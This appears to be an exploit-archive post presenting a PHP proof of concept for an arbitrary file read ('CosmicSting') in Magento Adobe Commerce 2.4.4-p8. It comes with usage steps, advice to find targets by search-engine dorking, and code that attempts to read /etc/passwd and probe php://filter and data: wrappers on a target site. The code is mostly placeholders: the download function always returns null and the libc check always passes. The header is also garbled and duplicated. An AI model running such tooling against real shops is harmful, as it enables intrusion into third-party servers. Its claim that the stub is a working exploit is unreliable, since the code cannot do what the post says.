=============================================================================================================================================
| # Title : Magento Adobe =============================================================================================================================================
| # Title : Magento Adobe Commerce 2.4.4-p8 arbitrary file read Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits) |
| # Vendor : https://experienceleague.adobe.com/en/docs/commerce-operations/release/notes/security-patches/2-4-4-patches |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] CosmicSting: Magento Arbitrary File Read in the iconv() function of glibc .

[+] save code as poc.php .

[+] Line 83 : set your target.

[+] USage : cmd => c:\www\test\php poc.php target.dz

[+] PayLoad :

<?php
class CosmicStingExploit {
private $targetUrl;
private $downloadFileTimeout = 10;

public function __construct($url) {
$this->targetUrl = $url;
}

public function check() {
echo "Setting up module...\n";

if ($this->checkMagento() && $this->checkPhpRequirements() && $this->checkLibcVersion()) {
echo "Exploit preconditions met. Target appears to be vulnerable.\n";
} else {
echo "Exploit preconditions not met. Target may be safe.\n";
}
}

private function checkMagento() {
$etcPassword = $this->downloadFile('/etc/passwd');
if ($etcPassword === null) {
echo "Unable to download /etc/passwd.\n";
return false;
} else {
echo "/etc/passwd downloaded successfully.\n";
return true;
}
}

private function checkPhpRequirements() {
$text = bin2hex(random_bytes(25));
$base64Text = base64_encode($text);
$dataWrapper = "data:text/plain;base64,{$base64Text}";

if ($this->downloadFile($dataWrapper) === $text) {
echo "Data wrapper is working.\n";
} else {
echo "Data wrapper not working.\n";
return false;
}

$filterWrapper = "php://filter//resource=data:text/plain;base64,{$base64Text}";

if ($this->downloadFile($filterWrapper) === $text) {
echo "Filter wrapper is working.\n";
} else {
echo "Filter wrapper not working.\n";
return false;
}

$compressedText = $this->compress($text);
$compressedBase64 = base64_encode($compressedText);
$zlibPath = "php://filter/zlib.inflate/resource=data:text/plain;base64,{$compressedBase64}";

if ($this->downloadFile($zlibPath) === $text) {
echo "Zlib extension is enabled.\n";
return true;
} else {
echo "Zlib extension not enabled.\n";
return false;
}
}

private function checkLibcVersion() {
// Placeholder for libc version check implementation
return true;
}

private function downloadFile($filePath) {
// This function should simulate a download attempt using HTTP requests
echo "Attempting to download {$filePath}\n";
// Placeholder to simulate download success or failure
return null; // Replace with actual download logic
}

private function compress($data) {
return gzdeflate($data, 9);
}
}

// Usage
$exploit = new CosmicStingExploit("http://target-application-url.com");
$exploit->check();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================